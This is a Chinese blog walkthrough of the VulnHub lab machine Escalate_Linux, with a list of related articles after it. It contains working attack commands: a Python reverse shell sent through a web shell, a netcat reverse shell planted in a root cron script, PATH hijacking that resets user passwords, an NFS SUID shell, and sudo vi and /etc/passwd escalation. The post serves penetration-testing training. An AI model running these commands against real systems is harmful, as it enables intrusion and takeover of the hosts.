Linux权限提升-Escalate_Linux

于 2024-08-12 18:46:48 发布
阅读量1.5k 收藏 8
点赞数 24
分类专栏: web渗透知识 文章标签: linux 运维 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2302_78903258/article/details/141129573
版权

1.环境准备

下载地址:Escalate_Linux: 1 ~ VulnHub

靶机环境:Nat模式

kaliip:192.168.26.128

2.渗透测试

信息收集
主机收集
arp-scan -l

//nmap -sP 192.168.26.0/24

 得知靶机ip地址:192.168.26.141

端口探测
nmap -sS -sV -p- 192.168.26.141

发现该主机开放了许多端口:80、111、139、445等端口

漏洞探测

访问该IP地址

打开站点是apache的默认站点

默认页面,尝试对web Directory Search 使用dirb对Web站点进行PHP页面暴破 因为一般web平台默认支持PHP dirb http:/192.168.236.131 -X .php(指定后缀名)

找到shell.php文件目录,一看到文件目录名就是传后门的

访问shell.php文件,页面显示通过 cmd 作为get参数

发现该网站存在命令执行漏洞

漏洞利用 

使用msf进行攻击

use exploit/multi/script/web_delivery

此模块支持在本地监听一个端口,别人一旦访问该端口就会将该端口内的文件读取至本地执行(把webshell放在该端口下刚刚好) 

设置服务端和本地地址都为攻击机ip,运行如下:

因为服务端会进行url解码,所以先将payload进行url编码,目前在kali上只能使用burpsuite中的url编码:

再将cmd参数传参进去,使得靶机ip访问payload信息

这里直接用python反弹shell

http://192.168.26.141/shell.php?cmd=export%20RHOST=%22192.168.26.128%22;export%20RPORT=2233;python%20-c%20%27import%20sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(%22RHOST%22),int(os.getenv(%22RPORT%22))));[os.dup2(s.fileno(),fd)%20for%20fd%20in%20(0,1,2)];pty.spawn(%22/bin/bash%22)%27

后面开启监听端口2233

成功获取到webshell权限 

权限提升 

枚举脚本下载,我们只需要在kali机用python开启一个服务器端,用靶机在tmp目录下下载枚举脚本,再执行,我们就可以获取信息

rebootuser/LinEnum: Scripted Local Linux Enumeration & Privilege Escalation Checks (github.com)

suid提权:

1)python实现交互式shell:

python -c 'import pty; pty.spawn("/bin/bash")'

2)首先查找下能否执行SUID特权的命令 

find / -perm -u=s -type f 2>/dev/null

看到用户user3下面有个shell命令文件,能够使用SUID

猜测此shell命令的二进制文件里面含有C语言setuid提权代码

3)进入user3目录执行./shell:

全局环境变量提权: 

1)使用user5的script脚本也可以进行提权,下面来探究一下如何进行提权操作

2)进入user5目录,执行发现和ls命令一样的结果,这是因为这个脚本是使用root权限执行ls命令,所以这里可以通过全局环境变量提权

3)全局变量提权的参考文章及命令:Linux Privilege Escalation Using PATH Variable - Hacking Articles

cd /tmp
echo "/bin/bash" > ls
chmod +x ls
echo $PATH
export PATH=/tmp:$PATH
cd /home/user5/
./script

计划任务crontab提权:

枚举脚本发现user4下有的Desktop有一个脚本是通过计划任务使用root权限执行,看了下脚本的内容,跟提权没有关系,但是我们要更改这个脚本,目前反弹的shell是user6没有对于权限,具体如下:

所以我们需要进入到user4用户更改脚本来达到目的,这里是不知道user4的密码,可以通过上一个提权方法直接更改其密码 

1.借鉴方法2,使用相同的脚本文件,借助Path变量方法更改user4用户的密码为123

cd /tmp
echo 'echo "user4:123" | chpasswd' >ls
chmod +x ls
echo $PATH
export PATH=/tmp:$PATH
cd /home/user5/
./script
su user4

2.使用msfvenom写一段反弹shell:

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.26.128 lport=8888 R

3.在user4桌面文件夹中看到文件autoscript.sh,将反弹shell写入到autoscript脚本中:

echo 'mkfifo /tmp/kndq; nc 192.168.26.128 8888 0</tmp/kndq | /bin/sh >/tmp/kndq 2>&1; rm /tmp/kndq' > autoscript.sh

 这里暂未能获得root权限,我操作的问题,大家可以看下面一篇博客

Vulnhub-靶机-ESCALATE_LINUX: 1 - 皇帽讲绿帽带法技巧 - 博客园 (cnblogs.com)

vi写入提权:

1.借鉴方法3,将所有用户8的密码更改为12345,并在用户之间切换来检查更多漏洞,发现user8对vi编辑器具有sudo权限

cd /tmp
echo 'echo "user8:123" | chpasswd' >ls
chmod +x ls
echo $PATH
export PATH=/tmp:$PATH
cd /home/user5/
./script
su user8

 2.使用sudo打开vi编辑器,并插入sh命令:

sudo vi
:!sh
<enter>

openssl提权: 

1.继续根据枚举的信息,确认user7是gid为0的组成员,使用和方法3相同的办法进入user7,切换至user7,发现user7属于gid为0的组

cd /tmp
echo 'echo "user7:123" | chpasswd' >ls
chmod +x ls
echo $PATH
export PATH=/tmp:$PATH
cd /home/user5/
./script
su user7

2.从LinEnum扫描中知道/etc/passwd文件对于用户是可写的:user7可以编辑/etc/passwd文件。

所以,创建了一个具有root特权的名为ysy的新用户,并使用openssl为该用户生成了密码:

3.将这个密码写入到我新建的ysy用户中:

查看一下,写进了!

4.使用ysy的账号密码登录即可获得超户权限 

NFS挂载提权:

1.枚举脚本含有针对NFS的服务

2.通过枚举的信息可知NFS服务配置不当导致直接提权,具体原因如下:

cat /etc/exports

3.发现/home/user5 *(rw,no_root_squash),意思是可以通过用户user5生成一个可提权的可执行文件放在目标靶机执行即可提权

4.挂载nfs到本地kali,生成一个提权文件

showmount -e 192.168.26.142
mount -t nfs 192.168.26.142:/home/user5 /tmp/

3.将user5通过NFS共享到本地,创建一个SUID执行:

cp /bin/sh rootysy
chown root:root rootysy
chmod 4755 rootysy

 

4.在shell中进入user5:

cd /home/user5
./rootysy

这里暂未获取到root权限

mysql提权:

1.尝试使用默认密码登录mysql:

mysql -u root -p

2.查看数据库,一般思路要从user表中获取密码:

show databases;
use user;
show tables;
select * from user_info;

3.获取mysql的密码为mysql@12345,所以切换至mysql用户

4.经过查找,发现用户1-8的密码:

ls -la
chmod 600 .user_informations
cat .user_informations

5.继续信息收集,在secret.cnf中发现root账号的密码:

cd /etc/mysql
cat secret.cnf

运行超户身份提权:

1.因为上面知道各个用户的密码,看看还有哪个用户没使用其进行提权,看了下user2没有,切换过去看看

2.根据提示执行:

sudo -u user1 bash  //以超户身份运行bash
sudo su

uid提权:

1.切换至user4,发现root的组里面有user4和user7,意思是user4和user7可以修改/etc/passwd文件,那么提权的方式跟方法五是一样的,直接添加uid为0的用户即可提权

su user4
 
cat /etc/group

2.使用openssl生成自定义的密码

shell提权:

1.看到/home/user3下面有.script.sh脚本内容同样是带setuid的权限直接执行提权即可

2.这里直接执行.script.sh是不能提权的,需要借用执行shell才能提权,因为通过strings命令查看shell的二进制文件发现里面是调用.script.sh所以套路跟方法一时候一样的,执行.script.sh脚本即可

echo "/bin/sh" >.script.sh
./shell

john爆破提权:

1.echo查看/etc/shadow文件,读取root的hash,并使用john中自带密码库进行爆破即可

但是查看此文件好像本身需要root权限,其他用户查看权限不够

user提权:

1.直接通过user1的密码查看sudo -l 的特权:

2.执行sudo -i即可提权:

Paranoid144
关注
专栏目录
Container Runtime Interface Specification by Linux Foundation
AI天才研究院
08-02 1120
2017年9月,Linux基金会(LF)发布了Containerd项目。作为其主要容器运行时引擎之一,containerd提供了可移植、轻量级的容器运行时接口(CRI),使得不同Linux系统间可以实现容器的一致性运行。Docker、RKT等知名容器平台均已经支持CRI接口。随后,Linux基金会将CRI规范以CCv0版本向社区征集意见。此次征集的结果证明,CRI的目标明确,具有良好的扩展性和稳定性,而且提供了高度抽象的接口规范,对于统一容器管理以及跨平台协作均非常重要。
基础漏洞I set-UID 定义\用法\攻击;权限泄漏;程序调用;特权SUID程序中的安全缺陷;如何提高特权程序的安全性
CHERRY_cong的博客
03-15 1743
基础漏洞I set-UID 定义,几种常见攻击方法;权限泄漏;调用攻击 Linux 系统,最常见的文件权限有 3 种,除此之外,我们有时会看到 s(针对可执行文件或目录,使文件在执行阶段,临时拥有文件所有者的权限)和 t(针对目录,任何用户都可以在此目录中创建文件,但只能删除自己的文件),文件设置 s 和 t 权限,会占用 x 权限的位置。 seed@seed-virtual-machine:~$ ls -l /usr/bin/passwd -rwsr-xr-x 1 root root 68208 5月
Linux 提权
代码审计
04-13 2565
Linux提权助手 github项目 cve-2022-0847 面试重要最新漏洞 linux polkit 权限提升 大通杀 一、漏洞概述 1月26日,绿盟科技CERT监测到Qualys研究团队公开披露了在Polkit的pkexec 中发现的一个权限提升漏洞(CVE-2021-4034) ,也被称为PwnKit。该漏洞是由于pkexec 无法正确处理调用参数,从而将环境变量作为命令执行,具有任意用户权限的攻击者都可以在默认配置下通过修改环境变量来利用此漏洞,从而获得受影响主机的ro
Linux权限提升
Williamanddog的博客
02-07 1485
SUID是Linux的一种权限机制,具有这种权限的文件会在其执行时,使调用者暂时获得该文件拥有者的 权限。如果拥有SUID权限,那么就可以利用系统中的二进制文件和工具来进行root提权。 CVE-2016-5195,即 Dirty COW,俗称「脏牛」漏洞。它是 Linux Kernel 中的条件竞争漏 洞,攻击者可以利用 Linux kernel 中的 COW(Copy-on-Write)技术中存在的逻辑漏洞完成对文件的 越权读写,恶意用户可利用此漏洞来获取高权限
LINUX权限提升
最新发布
weixin_41487048的博客
07-09 34
LINUX内核提权:CVE-2021-3493登录后复制 atp-cache search linux | grep linux-image1.可以运行这条命令来取查看可以安装的当前软件库的内核版本如果没有的话需要降级登录后复制 atp-get install linux-headers-4.4.0-21-generi...
linux权限提升,Linux权限提升
weixin_33772442的博客
04-29 263
来看passwd命令 (各字段分别为:文件属性字段,文件硬链接数或目录子目录数,文件拥有者,文件拥有者所在的组,文件文件大小(以字节为单位),文件创建月份,文件创建日期,文件创建时间,文件名。)passwd的owner是root,但是普通用户也可以用来修改自己的密码。正常来说,普通用户调用passwd,传递给passwd的权限是普通用户的权限,但是却修改了密码文件,说明修改密码文件的时候其权限是r...
权限提升Linux
weixin_56537388的博客
09-19 515
我们前面使用SUID提权的时候,其实很多命令都有SUID权限,但是为什么只有find等命令才可以作为提权命令呢,这是由这些命令的功能决定的,如果find没有exec这个参数,那他也不能用来提权,就比如拥有管理员权限的ping命令,但是可以用来提权吗,显然不能。在程序运行的时候,经常需要给程序以高权限,类似于Windows里的以管理员身份运行,通过上面的命令增加SUID,使普通用户可以以root用户的身份运行程序。现在尝试用SUID提权,使用上面的SUID提权网站。攻击者连接受害者主机。
Android签名与权限的安全问题(3)
林锐波
01-11 2248
签名和权限的作用Android签名中使用到的一些加密技术有:公/私钥, SHA1(CERT.SF,MANIFEST.MF), RSA(CERT.RSA), 消息摘要,移动平台中的主流签名作用: Android平台中是使用自签名 自签名,证书的签名者和证书拥有者是同一人. 自签名的完整性认证自签名是没有信任模式的,因为自签名信息是自己的,对无法知道该信息是不是安全,我们只能对其的完整性进行认证.限制
Python脚本编程秘法:用Kali Linux自动化渗透测试
[Python脚本编程秘法:用Kali Linux自动化渗透测试](https://img-blog.csdnimg.cn/4eac4f0588334db2bfd8d056df8c263a.png) # 1. Python脚本在渗透测试中的作用 ## 1.1 Python脚本与渗透测试的基本关系 Python是一...
AI-WEB-1.0靶机教程
qq_42553928的博客
04-06 6700
文章目录靶机概况下载地址靶机描述Description靶机信息靶机界面网卡信息信息收集主机发现端口扫描命令过程端口详情网站信息网站首页目录爆破敏感目录扫描m3diNf0目录se3reTdir777目录漏洞映射SQLI渗透过程SQLI漏洞利用查看我是谁创建一个名为webshell.php的文件下载文件到靶机运行上传的文件提权 靶机概况 下载地址 https://www.vulnhub.com/entry/ai-web-1,353/ 靶机描述 Description Difficulty: Intermedi
Linux权限提升总结_linux 提权
2401_84968977的博客
05-17 1095
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
Linux权限提升总结
m0_66458291的博客
04-01 1454
本文总结了Linux的一些提权检测项目和常见的提权方式,如suid提权 CVE提权,脏牛漏洞提权、脏管道提权、环境变量提权、定时任务天、权限配置特权、MDUT提权、Rsync提权、Docker提权、sudo提权、policykit提权
【Web】超级详细的Linux权限提升一站式笔记
uuzeray的博客
02-11 2287
SUID是一种特殊权限,设置了suid的程序文件,在用户执行该程序时,用户的权限是该程序文件属主的权限,例如程序文件的属主是root,那么执行该程序的用户就将暂时获得root账户的权限。sgid与suid类似,只是执行程序时获得的是文件属组的权限。passwd这个命令程序的权限设置,它就是设置了suid权限的注意以下几点:1. 只有可以执行的二进制程序文件才能设定SUID权限,非二进制文件设置SUID权限没任何意义.2. 命令执行者要对该程序文件拥有执行(x)权限.
Linux权限
xxtzzxx的博客
08-08 1263
就像我们日常生活中提到的医生、教师、程序员等是对一种职业或是一类人的统称,而非指的是具体的某个人。查看上述代码不难看出,bash进程的数目在逐渐增多,会造成对操作系统资源的浪费,所以为了避免这样的情况发生,我们可以通过用户回退的方式来进行用户的切换。那当我们有这么一种需求,others可以在特定的目录下创建自己的文件、写入自己文件、删除自己的文件,但是不想让他删除别人的文件。此外,有这样的一个问题,如果一个目录文件对others具有w权限,那么用户是否能够删除掉目录文件中的其它拥有者的文件?......
linux各种姿势权限提升超超超细致教程
qq_41245301的博客
05-14 1815
PATH 环境变量劫持提权,因为PATH环境变量是按照路径顺序执行命令,当黑客把恶意脚本改成你常用的命令并且,把路径改到最前面,那么久会发生环境变量劫持。重点关系统任务计划配置文件(/etc/crontab)的内容?检查root用户的任务计划?查看有没有错误的配置服务?查看配置文件是否包含有漏洞的插件?检查root用户的任务计划(普通用户是没有权限查看的)那些服务是开机运行的?查看当前目下可以读的文件。查看当前目下可以写的文件。查看cron目录中的内容。查看我们具有写入权限的脚本。查看socket的路径。
Escalate_Linux靶机详解(1)
苏生要努力
02-21 590
name=xiao&pwd=123456如果你的value字符串中包含了=或者&,那么势必会造成接收U川的服务器解析错误,因此必须将引起歧义的&和=符号进行转义,也就是对其进行编码。背景:目标系统存在远程文件包含漏洞或者命令注入漏洞,想在目标设备上加载webshell,. 但不想在目标设备硬盘上留下任何webshell文件信息 (2)利用nc或python的方法反弹shell不好使用 解决思路:让目标设备从远端服务器加载webshell代码至内存执行。获得meterpreter。使用BP进行url编码。
escalate靶机为例学习linux提权方式-linux提权学习笔记(1)
zr1213159840的博客
06-25 3045
linux11种提权方式总结
Escalate_Linux靶机提权渗透测试
末班车的博客
03-10 787
使用Escalate_Linux靶机学习多种提权方法
linux CVE-2016-2183)
08-25
CVE-2016-2183 is a vulnerability that was found in the Linux kernel. This vulnerability allows local users to gain root privileges by leveraging a race condition in the keyring implementation. By exploiting this vulnerability, an attacker can escalate their privileges and gain unauthorized access to the system. It is recommended to apply the relevant patches or updates provided by the Linux distribution to mitigate this vulnerability.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值